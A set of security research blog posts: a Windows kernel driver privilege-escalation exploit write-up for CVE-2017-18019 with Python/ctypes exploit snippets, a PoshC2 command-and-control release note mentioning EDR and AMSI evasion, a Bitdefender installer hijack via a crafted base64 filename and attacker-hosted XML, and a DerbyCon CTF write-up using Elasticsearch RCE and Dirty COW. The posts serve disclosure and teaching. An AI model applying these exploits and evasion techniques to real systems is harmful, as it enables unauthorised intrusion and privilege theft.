Privilege Escalation via a Kernel Pointer Dereference (CVE-2017-18019)

A little while ago, I discovered a vulnerability, CVE-2017-18019, affecting a kernel driver used by multiple K7 Computing security products, as well as by Defenx products, both on Windows. Both vendors were affected because they were using the same antivirus engine, and both are now patched.

The proof of concept was based on an invalid kernel pointer dereference, which led to a blue screen of death. That research and the subsequent coordinated disclosure process were, at the time, sponsored and handled by SecuriTeam. It turned out that the proof of concept could be exploited further and turned into a local privilege escalation, so, with the permission of SecuriTeam, I decided to create a write-up of that privilege escalation development process.

Targeting

This article targets the following 64-bit Windows versions: Windows 7 SP1 – Windows 10 v1809.

A Medium integrity level is required in order to exploit this vulnerability in the way demonstrated in this article. In order to exploit it from a Low integrity level, you would have to do extra work to leak some kernel pointers. This could be done either through other IOCTL handlers of the target driver itself, or through kernel memory leak bugs in other Windows drivers.

Bug Analysis

The root cause of this issue is that the author of the following function trusts a read pointer originating from a user-supplied input buffer, as long as it references an address inside the kernel address space.

The vulnerable function fetches a pointer from the IOCTL’s input buffer and checks whether it is greater than or equal to nt!MmHighestUserAddress (0x00007ffffffeffff on x64). If it is, the function proceeds to dereference that pointer and evaluate the first byte located at that memory address.

Clearly, the purpose of this check (even though the implementation is buggy) is to verify that the pointer from which further information will be read resides in kernel memory, whose virtual addresses and contents, from the developer’s perspective, are not supposed to be known or controlled by the user. This, of course, is not entirely true, because kernel object addresses may be leaked, and they may also reference, directly or indirectly, user-supplied data.

The following screenshot shows (in grouped nodes) what we described above.

Figure 1 – Verify it is a kernel pointer.

We can easily crash the host by supplying an arbitrary kernel pointer that references a non-allocated memory page.

The following image shows the output from WinDbg at the moment the memory access violation occurs.

Figure 2. Arbitrary kernel pointer dereference.

Further Analysis

What we know at this point is that we have a denial of service bug that can be triggered by any user in order to crash the host. So, we analysed this function further to find out whether there was anything more we could do with it.

The following graph-view screenshot continues directly from what is shown in Figure 1.

Figure 3. Kernel memory buffer data checks.

Assuming that RCX points to a valid kernel address where the first byte is 0x4B, so that the previous check succeeds (cmp byte ptr [rcx], 4Bh), we arrive at the second part of the vulnerable function as shown above.

Here we notice further byte value checks; specifically, the second byte of the buffer referenced by RCX must be 0xFF in order to reach the final part of our analysis.

Figure 4. Arbitrary Function Pointer Call.

A couple of pointer dereferences later, we see that the function treats the final value as a function pointer. We also notice that the first and second parameters, passed in RCX and RDX respectively, can also be controlled.

To be more specific, the first parameter is taken from the buffer referenced by the arbitrary kernel pointer that we control, and the second one points inside the user input buffer that is supplied through the call to the DeviceIoControl function.
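For illustration, reaching the vulnerable handler from user mode looks roughly like the following Python/ctypes sketch. The device name and IOCTL code are placeholders, as the real values are specific to the affected driver and are not reproduced here.

import ctypes, struct
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.CreateFileW.restype = wintypes.HANDLE

DEVICE_PATH = r"\\.\ExampleDevice"    # placeholder device name
IOCTL_VULNERABLE = 0x222000           # placeholder IOCTL code
GENERIC_READ, GENERIC_WRITE, OPEN_EXISTING = 0x80000000, 0x40000000, 3

device = kernel32.CreateFileW(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)

# The input buffer carries the pointer that the driver will dereference; it is
# placed at offset 0 purely for illustration. Pointing it at an unmapped
# kernel address reproduces the BSOD from the original proof of concept.
in_buf = ctypes.create_string_buffer(0x20)
struct.pack_into("<Q", in_buf, 0, 0xFFFFF00012345678)  # arbitrary kernel-space address

returned = wintypes.DWORD(0)
kernel32.DeviceIoControl(device, IOCTL_VULNERABLE, in_buf, len(in_buf), None, 0, ctypes.byref(returned), None)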

Setting things up

At this point, we have all the information we need in order to proceed with exploitation. To do that, we must know the address of a kernel object and also control its contents, at least to a certain extent. As we discussed, the initial pointer, from which the rest of the data is read (ultimately leading to a function pointer being called), must reference an address inside the kernel address space. This is also the basis of the developer’s assumption about the safety of that decision.

In a previous article we talked about Private Namespaces and the ability to insert user-defined data in the body of the associated kernel object. We will be using this type of object in order to exploit the vulnerability, as it can be used reliably in this case as well.

In order to exploit this vulnerability, we will be using two kernel objects of the aforementioned type. The first object will be used to control the subsequent pointer dereferences that let us call an arbitrary function pointer, while the second object will be used to satisfy the initial kernel pointer check, and must therefore reference a known kernel object in memory (the first object).

Exploitation in Windows 7 SP1 x64

In the absence of exploitation mitigations such as SMEP (Supervisor Mode Execution Prevention), taking advantage of this vulnerability is quite straightforward. We can execute our payload function in userland without taking any additional steps, such as temporarily disabling SMEP. We just need to control the instruction pointer, and that is enough.

To start with, we will create a Private Namespace object using a random boundary name, and we will use the NtQuerySystemInformation function to leak its address.

Figure 5. 1st Object (Win7 SP1 x64).
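For reference, the leak itself can be done from Medium integrity using the well-known extended handle table technique. A Python/ctypes sketch for x64 follows, where namespace_handle is assumed to be the handle returned when the private namespace was created:

import ctypes
from ctypes import wintypes

ntdll = ctypes.WinDLL("ntdll")
SystemExtendedHandleInformation = 64
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004

class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(ctypes.Structure):
    _fields_ = [("Object", ctypes.c_void_p), ("UniqueProcessId", ctypes.c_void_p),
                ("HandleValue", ctypes.c_void_p), ("GrantedAccess", wintypes.ULONG),
                ("CreatorBackTraceIndex", wintypes.USHORT), ("ObjectTypeIndex", wintypes.USHORT),
                ("HandleAttributes", wintypes.ULONG), ("Reserved", wintypes.ULONG)]

def leak_object_address(target_handle):
    size = 0x10000
    while True:  # grow the buffer until the handle snapshot fits
        buf = ctypes.create_string_buffer(size)
        ret_len = wintypes.ULONG(0)
        status = ntdll.NtQuerySystemInformation(SystemExtendedHandleInformation, buf, size, ctypes.byref(ret_len))
        if (status & 0xFFFFFFFF) != STATUS_INFO_LENGTH_MISMATCH:
            break
        size *= 2
    count = ctypes.cast(buf, ctypes.POINTER(ctypes.c_size_t))[0]   # NumberOfHandles
    first_entry = ctypes.addressof(buf) + 2 * ctypes.sizeof(ctypes.c_void_p)
    entries = ctypes.cast(first_entry, ctypes.POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX))
    pid = ctypes.windll.kernel32.GetCurrentProcessId()
    for i in range(count):
        entry = entries[i]
        if entry.UniqueProcessId == pid and entry.HandleValue == target_handle:
            return entry.Object  # kernel address of the object behind our handle
    return None

first_obj = leak_object_address(namespace_handle)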

Then, we will create another object of the same type with a crafted boundary name.

The first and second bytes must be 0x4B and 0xFF respectively (see Figures 1 and 3) to satisfy the byte value checks. Also, at offset 0x0A of the crafted boundary name (Figure 4 – first pointer dereference), we will insert the address of the first object, plus the distance in bytes (0x1a0) between that address and the location of the boundary name inside the object, plus an arbitrary offset (0x1A) whose contents can be translated to a userland pointer, which satisfies the proof of concept for this version of Windows. Note that the value 0x0C will be added to the result of this calculation in order to reach the userland pointer value (Figure 4 – second pointer dereference), so we subtract it up front.
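In code, that construction might look like the following; a sketch with a simplified buffer layout, reusing the first_obj address leaked above:

import struct

boundary = bytearray(0x30)
boundary[0] = 0x4B   # first byte value check (Figure 1)
boundary[1] = 0xFF   # second byte value check (Figure 3)
# Pre-compensate for the 0x0C that will be added before the second dereference.
target = first_obj + 0x1A0 + 0x1A - 0x0C
struct.pack_into("<Q", boundary, 0x0A, target)  # consumed by the first dereference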

Figure 6. 2nd Object (Win7 SP1 x64).

Let’s have a closer look at how these two objects are ‘inter-connected’.

Figure 7. Objects Interconnection (Win7 SP1 x64).

Finally, we can see the function pointer being called, in order to execute our payload at address 0x1010000.

Figure 8. Call Payload-Function Pointer (Win7 SP1 x64).

Exploitation in Windows 8.1 – 10 v1809 x64

In more recent Windows versions, exploiting a kernel driver bug is more challenging due to the exploitation mitigations that have been added. In this case, we take control of the execution flow by calling an arbitrary function; however, due to SMEP we are not able to directly execute code residing in the user address space from kernel mode, so we have to take another approach.

A common solution is to temporarily disable SMEP by clearing the 20th bit of the CR4 register on a specific processor, and to lock our thread’s execution to that processor, so that we can execute our payload in userland as before. However, we would then have to restore CR4 in order to avoid KPP (Kernel Patch Protection/PatchGuard) killing the host.

Another way, which we will be using in this write-up, is to take advantage of the execution flow control in order to turn it into a “write-what-where” primitive, which will enable us to modify arbitrary data in kernel memory. Once that is achieved, there are, again, two common ways of taking advantage of this in order to elevate our privileges.

The first method is to overwrite the SD (Security Descriptor) pointer in the object header of an elevated process running as SYSTEM with a NULL value. This allows a non-privileged process to inject and execute malicious code in that security context. However, this method only works up to Windows 10 v1511 (Build 10586), as described in this article.

Another way to take advantage of a “write-what-where” primitive is to enable privileges in the primary token of a non-privileged process, which again enables it to inject and execute code in the security context of a process running as SYSTEM. This method still works, but it requires a minor modification from Windows 10 v1709 (Build 15063) onwards, as described here. The approach described below can also be used in Windows 7.

Going back to what we have described so far, we noted that we are also able to control the first two parameters (see Figure 4), passed in RCX and RDX respectively, once our arbitrary function is called. We are going to take advantage of this capability in a moment.

In this case, we first need to leak the address of the primary token of our process, in which we will be enabling additional privileges. We will use that address as the target of our exploitation primitive. As in Windows 7, NtQuerySystemInformation can be used from a standard Medium integrity user process to leak the kernel object and function addresses that we will be using.

We will then create our first Private Namespace object with a custom boundary name, whose first 8 bytes will be set to the kernel address that we will use as our ‘gadget’ to modify arbitrary kernel data. So, instead of executing a payload in userland, we will redirect execution to the kernel function nt!RtlCopyLuid, which will let us modify arbitrary kernel data.

Figure 9. nt!RtlCopyLuid.

Since we control both the RCX and RDX registers, we can use this function to complete our “write-what-where” primitive.
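nt!RtlCopyLuid simply copies an 8-byte LUID from its second argument (RDX) to its first (RCX). Conveniently, the same routine is also exported by ntdll, so its write-what-where semantics can be demonstrated from user mode:

import ctypes

ntdll = ctypes.WinDLL("ntdll")
src = ctypes.c_uint64(0x1122334455667788)
dst = ctypes.c_uint64(0)
ntdll.RtlCopyLuid(ctypes.byref(dst), ctypes.byref(src))  # *dst = *src, 8 bytes
print(hex(dst.value))  # 0x1122334455667788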

We will again need a second Private Namespace object with a custom boundary name, which at offset 0x0A of the name data (Figure 8 – first pointer dereference) must contain the address of the first object plus the distance in bytes (0x1a0) between that address and the location of the boundary name in that object. Remember that in the first 8 bytes of the boundary name of the first Private Namespace object, we inserted the address of nt!RtlCopyLuid. Note that, as before, we must take into account that the value 0x0C will be added to the result of this calculation in order to reach our arbitrary kernel function pointer value, which is loaded into the R10 register (Figure 8 – second pointer dereference).

So, this is how it should look:

*(ULONG_PTR*)(boundaryName + 0x0A) = customPrivNameSpaceAddress + boundaryNameOffsetInDireObject - 0x0C;

Then, we need to take control of the first two parameters.

The first parameter, loaded into RCX, is again read from our custom boundary name, at offset 2 (the first two bytes of our custom boundary name must be 0x4B, 0xFF). So, there we will set the address of our process’s token object plus the offset (0x40) needed to reach the nt!_SEP_TOKEN_PRIVILEGES structure member.

Figure 10. nt!_SEP_TOKEN_PRIVILEGES.

It should look as follows:

*(ULONG_PTR*)(boundaryName + 0x02) = tokenAddress + 0x40;

Finally, we can also control RDX, since the value of R12 is copied over it, and R12 points at the address of our userland input buffer + 0x10 (see Figure 1 – 6th node). This is where the data that will be written to the arbitrary kernel address is read from. In this case we will overwrite the ‘Enabled’ and ‘Present’ privileges members of the aforementioned structure (Figure 10).

It should look like this:

*(unsigned __int64*)(inputBuf + 0x10) = ULLONG_MAX;

So, our exploit will have to reach the vulnerable function twice in order to complete the attack, once for each 8-byte member being overwritten.
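Conceptually, the loop looks like the following sketch, where trigger_ioctl() stands for the DeviceIoControl call shown earlier and retarget_boundary_name() stands for rebuilding the second object so that RCX lands on the chosen member; both helpers, and the member offsets, are illustrative:

import struct

SEP_TOKEN_PRIVILEGES_OFFSET = 0x40          # offset of _SEP_TOKEN_PRIVILEGES in the token
for member in (0x00, 0x08):                 # Present, then Enabled
    retarget_boundary_name(token_address + SEP_TOKEN_PRIVILEGES_OFFSET + member)
    struct.pack_into("<Q", in_buf, 0x10, 0xFFFFFFFFFFFFFFFF)  # value for RtlCopyLuid to write
    trigger_ioctl(in_buf)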

Figure 11. Objects Interconnection – Write-What-Where Primitive.

The image above shows how the two objects are ‘interconnected’ in order to complete our “write-what-where” primitive to finalize the exploit.

Conclusion

This was an interesting bug to examine and exploit, as it shows once more that no input data should ever be blindly trusted. From the developer’s perspective, trusting a kernel pointer to read data from, presumably out of the user’s control, seemed like a ‘safe’ decision. However, it turned into a serious vulnerability in multiple products of two different vendors that use the same SDK.

Introducing PoshC2 v4.8 – includes C# dropper, task management and more! – Part One

We recently released version 4.8 of PoshC2 Python, which includes a number of fixes and improvements that help facilitate simulated attacks. This is the first in a series of posts covering some of the details of those fixes and updates, along with some of the other cool features we have been working on in the background.

C Sharp (C#)

As of PoshC2 version 4.6, a C# implant has been available. The main driver behind this implementation was to steer clear of System.Management.Automation.dll in environments that are heavily monitored, where an EDR product can detect the modules loaded inside a running process. Granted, not all EDR products currently do this, as it can incur a performance hit at the endpoint, but it’s important to understand the OPSEC implications of running different C2 droppers.

This has been a work in progress since its release and is continually improving, and we believe it will be the way forward in the months to come against advanced blue teams with a good detection and response capability across the organisation. Currently the implant is fully functional and allows an operator to load any C# assembly and execute it in the running process. This lets users extend the functionality massively, because they’re able to load all the great modules out there in the wild created by other infosec authors. Assemblies are loaded using the System.Reflection namespace; the code can then be called using .NET reflection, which searches the current AppDomain for the assembly name and attempts to run either the given entry point or the main method of the executable. An example usage is as follows, for both run-exe and run-dll:

run-exe:

run-dll:

Task Management

One of the issues we’ve overcome in this release was around tracking tasks; there was no way to determine which output related to which issued command. This was largely because the implant did not use task IDs that were tracked throughout the entire command process flow.

Typically this was fine, because you know what command you’re running, but when multiple people are working on the same instance, or if multiple similar commands are run, it could be difficult to figure out which output came from which command. It also made failed commands fairly difficult, if not impossible, to track. The following screenshots show the output inside the C2Server and the CompletedTasks HTML file:

Figure 1: How commands were issued and returned against an implant

Figure 2: The old format of the tasks report

Furthermore, tasks were only logged in the database when the implant responded with some output. Now, tasks are inserted as soon as they are picked up by the implant, with a start time, and are updated with a completed time and the desired output when they return. This allows us to track tasks even if they kill the implant or error and never return, and to see how long they took. It also allows us to reference tasks by ID, matching them in the C2Server log and referring to each task only by its ID in the response, decreasing message length and improving operational security. An example of the output is shown below:

Figure 3: The new task logging

The generated report then looks like this:

Figure 4: The new report format
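Under the hood, the lifecycle is conceptually simple. A hypothetical sketch of the insert-on-pickup/update-on-return logic follows; the table and column names are illustrative rather than PoshC2’s actual schema:

import sqlite3, datetime

db = sqlite3.connect("poshc2.db")
db.execute("""CREATE TABLE IF NOT EXISTS Tasks (
    TaskID INTEGER PRIMARY KEY AUTOINCREMENT,
    Command TEXT, User TEXT, SentTime TEXT, CompletedTime TEXT, Output TEXT)""")

def task_picked_up(command, user):
    # Insert as soon as the implant picks the task up, recording a start time.
    cur = db.execute("INSERT INTO Tasks (Command, User, SentTime) VALUES (?, ?, ?)",
                     (command, user, datetime.datetime.utcnow().isoformat()))
    db.commit()
    return cur.lastrowid  # the ID used to match output back to the issued command

def task_completed(task_id, output):
    # Update with the completed time and the output once the response returns.
    db.execute("UPDATE Tasks SET CompletedTime = ?, Output = ? WHERE TaskID = ?",
               (datetime.datetime.utcnow().isoformat(), output, task_id))
    db.commit()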

User Logging

The astute amongst you will have noticed the new User column in the report above. Another improvement that has been made in relation to tracking tasks is user logging. Now, when you start the ImplantHandler, you are prompted for a username; it is possible to leave this blank if required, but when PoshC2 is being used as a centralised C2Server with multiple users, it’s important to track which user ran which task, as shown in the examples below:

Figure 5: You are now prompted for a username when you start the ImplantHandler

All tasks issued from that ImplantHandler instance will be logged as that user, both in the C2Server log and in the report.

Figure 6: If a username is set it is logged in the task output

Figure 7: The username is also logged for the task in the report

For scripting and/or ease of use, the ImplantHandler can also be started with the -u or --user option, which sets the username, avoiding the prompt:

python ImplantHandler.py --user "bobby b"

Beacon Timing

The way beacon sleep times were handled was inconsistent between implant types, so we’ve now standardised it. All beacon times must be given as a value and a unit, such as 5m, 10s or 2h, and are displayed as such for all implant types in the ImplantHandler. In the old format, seen below, the fourth column stated the current beacon time in seconds, whereas now only the newer format is shown.

Figure 8: The old beacon time format

Figure 9: The new beacon time format

Validation has also been added for these, so attempting to set an invalid beacon time will print a suitable error message and do nothing.

Figure 10: The validation message if an invalid format is set
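For illustration, validation along these lines would do the job (a sketch, not PoshC2’s actual implementation):

import re

BEACON_FORMAT = re.compile(r"^(\d+)([smh])$")

def parse_beacon(value):
    # Returns the interval in seconds, or None if the format is invalid.
    match = BEACON_FORMAT.match(value.strip().lower())
    if not match:
        return None
    number, unit = int(match.group(1)), match.group(2)
    return number * {"s": 1, "m": 60, "h": 3600}[unit]

print(parse_beacon("5m"))   # 300
print(parse_beacon("300"))  # None, so print an error and do nothing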

We’ve also changed the implant colour coding so that implants are only flagged as timing out if they haven’t checked in for a multiple of their beacon time, as opposed to a hard-coded value.

Previously the implants would be coloured as yellow if they hadn’t checked in for 10 minutes or more, and red for 60 minutes or more. Now they are coloured yellow if they have not checked in for 3x beacon time, and red for 10x beacon time, granting far more accurate and timely feedback to the operator.

Figure 11: Implant colour coding has been improved so that the colour is dependent on the beacon time

C2Viewer

The C2Viewer was a legacy script used to just print the C2Server log, useful when multiple people want to be able to view and manipulate the output independently.

There were a few issues with the implementation, however, and there was a possibility that it would miss output as it polled the database. Additionally, being a separate script, it added maintenance headaches whenever task output handling was updated.

This file has now been removed, and instead if you want to view the output in the same way, we recommend that you run the C2Server and pipe it to a log file. You can print the log to stdout and a log file using tee:

python -u C2Server.py | tee -a /var/log/poshc2_server.log

This output can then be viewed and manipulated by anyone, such as by using tail:

tail -f -n 50 /var/log/poshc2_server.log

This method has the added benefit of storing all server output. While all relevant data is stored in the database, having a backup of the output actually seen in the log during usage can be extremely useful.

Further details can be found in the README.md.

Internal Refactoring

We’re also making strides to improve the internals of PoshC2, refactoring files for clarity and cutting cyclic dependencies. We aim to modularise the entire code base in order to make it more accessible and easier to maintain and change, but as this is a sizeable undertaking we’ll be doing it incrementally to limit the impact.

Conclusion

There have been quite a few changes made, and we’re aiming to not only improve the technical capabilities of PoshC2, but also the usability and maintainability.

Naturally, any changes come with a risk of breaking things no matter how thorough the testing, so please report any issues found on the GitHub page at: https://github.com/nettitude/PoshC2_Python.

The full list of changes is below; as always, keep an eye on the changelog, as we update it with the changes in each version to make tracking easier. This is the first in a series of blogs on additional features and capability within PoshC2. Stay tuned for more information.

  • Insert tasks when first picked up by the implant with start time
  • Update task when response returned with output and completed time
  • Log task ID in task sent/received
  • Add ability to set username and associate username to tasks issued
  • Print user in task information when the username is not empty
  • Improved error handling and logging
  • Rename CompletedTasks table to Tasks table
  • Method name refactoring around above changes
  • Pull out implant cores into Implant-Core.py/.cs/.ps1
  • Rename 2nd stage cores into Stage2-Core.py/.ps1
  • Stage2-Core.ps1 (previously Implant-Core.ps1) is no longer flagged by AMSI
  • Use prepared statements in the DB
  • Refactoring work to start to break up dependency cycle
  • Rename DB to Database in Config.py to avoid name clashes
  • Pull some dependency-less functions into Utils.py to aid dependency management
  • Fix download-file so that if the same file is downloaded multiple times it gets saved as name-1.ext, name-2.ext, etc.
  • Adjust user/host printing to always be domain\username @ hostname in implants & logs
  • Fix CreateRawBase payload creation, used in gzip powershell stager and commands like get-system
  • Added ImplantID to Tasks table as a foreign key, so it’s logged in the Tasks report
  • Added Testing.md for testing checklist/methodology
  • Fix Get-ScreenshotAllWindows to return correct file extension
  • Fix searchhelp for commands with caps
  • Implant timeout highlighting is now based on beacon time – yellow if it’s not checked in for 3x beacon time and red if not checked in for 10x beacon time
  • Setting and viewing beacon time is now consistent across config and implant types – always 50s/10m/1h format
  • Added validation for beacon time that it matches the correct format
  • Fix StartAnotherImplant command for python implant
  • Rename RandomURI column in html output to Context, and print it as domain\username @ hostname
  • Move service instructions to readme so that poshc2.service can just be copied to /lib/systemd/system
  • Removed C2Viewer.py and added instructions for same functionality to readme just using system commands

CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution

We recently identified a vulnerability in the digitally signed Bitdefender GravityZone installer. The vulnerability allows an attacker to execute malicious code without breaking the original digital signature, and without embedding anything malicious into the installer itself. This means that an appropriately positioned attacker can cause the signed installer to run an arbitrary remotely hosted executable.

We consider this to be a vulnerability worthy of analysis because of the way that it works. It is a good example of how developer creativity can bypass otherwise robust security controls.

You can base64 but you can’t hide

Earlier this year, we noticed a tweet about some AV comparison results that prompted us to download an evaluation copy of the Bitdefender GravityZone installer.

The installation is done via a digitally signed executable of about 3.4 MB. We downloaded the installer in a VM, verified the digital signatures, and then noticed an eye-catching file name that caused us to pause. The filename was of the following format:

  • setupdownloader_[base64_string].exe

That was slightly odd, so we decided to find out what that base64 string was used for.  The actual filename of the executable was:

  • setupdownloader_[aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==].exe

The base64 string decoded to:

  • https://cloudgz-ecs.gravityzone.bitdefender.com/Packages/BSTWIN/0/_9JZBM/installer.xml?lang=en-US

Digging deeper

This was a URL to an XML file, which was interesting enough to prompt us to dig a little deeper. What would happen if we replaced the base64 string with one that points to an XML file controlled by us?

We changed the filename to:

  • setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe

The base64 in that filename was modified to contain the URL:

  • http://thiscantbetrue.com/installer.xml
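Crafting such a filename is trivial. A sketch follows; the installer appears to use a filename-safe base64 variant, but for this URL the standard alphabet happens to produce an identical, filename-safe result:

import base64

url = "http://thiscantbetrue.com/installer.xml"  # attacker-controlled XML
encoded = base64.b64encode(url.encode()).decode()
print("setupdownloader_[{}].exe".format(encoded))
# setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe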

We reran the installer and the results are shown below.

As you can see, the executable was attempting to download the XML file from our own domain. At this point, we downloaded the original XML file and examined its contents.

Within the original XML file, we identified the following interesting looking section:

We replaced that entry with:

We then copied the modified XML file over to our HTTP server.

What we had at that point was the signed GravityZone installer that now contained a URL in base64 that in turn pointed to an XML file under our control. The modified XML file had a new downloadUrl entry which pointed to our HTTP server.

Going one step further

We ran the installer again, this time with the modified base64 string and subsequently modified XML file. That gave us the following error message:

We consequently fired up Wireshark and found the HTTP request that was giving us problems:

We were missing an extra sub-directory named win32, and on top of that we noticed that the setup was looking for another XML file, which we didn’t yet have. Note that our guest OS was 32-bit, and for that reason the installer was looking for the 32-bit modules on the remote server.

We had to identify the structure and contents of the data.xml file that the setup was looking for, and the easiest way to find that out was to allow it to contact the original server.

At this point, we used a simple trick to avoid having to inspect encrypted data passing over HTTPS: we restored the original download URL in installer.xml, but replaced HTTPS with HTTP.

Consequently, we obtained the contents of the data.xml file by locating the relevant HTTP request:

Of course, you could also just download that file by using your web browser. 🙂

Putting everything together

The data.xml file contained a list of the files that will be downloaded. The following image shows a few of them.

The file ended with the final command to be executed, which essentially instructed the setup application to execute one of the downloaded files called "Installer.exe": <run_command params="" proc="Installer.exe" />

As you can see, the setup application blindly trusted the installer.xml file and subsequently the information provided by the downloaded data.xml file.

In other words, we could change that list and the setup application would download and execute a file of our choice, as long as we also provided the correct MD5 hash for it, which of course was not an issue.

To make things worse, an attacker could set up a server with all the legitimate files and just add an extra executable and/or DLL module to the list. This would allow the installation to progress as expected, while silently performing malicious activity on the target system.

Conclusion

We believe that there is a lot that developers can learn from this vulnerability:

  • You must never blindly trust a binary just because it is digitally signed.
  • Even robust security measures can be undermined by subsequent poor implementation decisions.
  • A digital signature can ensure that a file has not been tampered with, but this does not include the filename.

As remediation for this vulnerability, Bitdefender released new patched installers and went through a certificate revocation process of the affected certificates.

Disclosure Timeline

Bitdefender were very responsive throughout the disclosure process. A timeline of key dates is as follows:

  • Date of discovery: 18 March 2018
  • Bitdefender informed: 19 March 2018
  • Bitdefender acknowledged vulnerability: 20 March 2018
  • Bitdefender marked the vulnerability as severe: 29 March 2018
  • Bitdefender requested extra time to address certificate revocation: 12 April 2018
  • Public Disclosure: 16 October 2018

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48-hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years (2016, 2017), we’ve written up an analysis of a small number of the challenges we faced.


Susan

This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. It was possible to use the mail service’s VRFY command to confirm susan as a user on the system, and to use the service to send email. Some time was spent using the mail service to send email internally, with no result.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute force. We’ll be kind to ourselves and say that this was potentially due to network stability issues, since the eventually discovered correct pair of credentials had been passed to the server during multiple brute force attempts.

We will come back to Susan later in this post…

Elastihax

There were a number of easy-to-grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the installed version of Elasticsearch (API 1.1.1), which allows remote code execution. An exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW (CVE-2016-5195), using an exploit variant that adds an account named firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags; however, of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorised keys files. One of the more fun flags was saved in the user’s home directory at Pictures/Wallpapers/Untitled.png and was retrieved from the box; VNC was running on localhost, and while we saw a number of people port forwarding through the box to reach it, we just downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.


We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to aolOneBar@Bill.io – the flag for this challenge.


It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. As with the previous binary, the user was prompted to enter a key when the binary was executed. This time, things looked a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it seemed that the user’s input was compared to a reference string (which looked like a mangled email address) in the following fashion, sketched in code after the list:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.
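Our reading of that algorithm, expressed as a quick Python sketch (illustrative only; the real reference string was the mangled email address embedded in the binary):

def matches(user_input, reference):
    idx = 0                                   # position in the reference string
    for start in range(13):                   # last, penultimate, ... starting points
        pos = len(user_input) - 1 - start
        while pos >= 0 and idx < len(reference):
            if user_input[pos] != reference[idx]:
                return False
            idx += 1
            pos -= 13                         # skip backwards 13 characters
    return idx >= len(reference)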

Knowing that comparison algorithm, one could reverse it until this challenge’s flag was identified. However, under the pressure of the CTF, we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:

  • microsoftaolmicrosoftaolFredBobNetlive@TED.io

This was the flag for this challenge.
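The filtering itself only took a few lines; in sketch form, with red_herrings and reference standing in for the strings dumped from the binary (neither reproduced here):

from collections import Counter

def writable_from(candidate, reference):
    # The binary never compared the input's first character, so skip it.
    need, have = Counter(candidate[1:]), Counter(reference)
    return all(have[c] >= n for c, n in need.items())

candidates = [s for s in red_herrings if writable_from(s, reference)]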

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:


Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed that the file was encoded with a rotating single-byte XOR key: every byte of the file was XOR’ed with a key byte, which was then incremented by 0x07. The original XOR key byte could not be recovered through reverse engineering alone, because it was based on a random value.

However, since the key was a single byte, we could simply brute force all 256 possible initial values with a few lines of Python.
